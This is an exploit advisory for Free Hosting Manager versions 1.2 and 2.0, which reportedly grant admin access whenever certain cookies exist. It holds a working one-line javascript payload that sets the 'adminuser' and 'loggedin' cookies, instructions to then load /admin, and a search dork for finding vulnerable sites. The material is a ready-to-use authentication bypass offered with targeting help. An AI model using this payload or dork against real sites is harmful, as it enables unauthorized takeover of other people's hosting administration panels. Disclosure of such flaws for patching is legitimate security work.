Free Hosting manager versions 1.2 and 2.0 suffer from an insecure cookie handling vulnerability that allows for administrative access.
69883472e5b57986a4759b0fc909b2d684d7436957116f08739eecd1c6a7e38a
#########################################################################
# #
#Free Hosting Manager = 1.2 & 2.0 Insecure Cookie Handling Vulnerability#
# #
#########################################################################
# #
# AUTHOR : Scary-Boys #
# HOME : http://scary-boys.com #
# Founded By : lvlr-Erfan #
# Download : http://www.fhm-script.com/download.php #
# #
#########################################################################
# #
# DorKs : "Powered By Free Hosting Manager" #
# #
#########################################################################
# #
# DESCRIPTION : #
# the admin panel only checks if the cookie exists. #
# #
#########################################################################
# #
# Vulnerability : #
# #
# javascript:document.cookie = "adminuser=1; path=/"; document.cookie = "loggedin=1; path=/";
# #
#########################################################################
# #
# after running the javascript, Go to "/admin" & Refresh #
# #
#########################################################################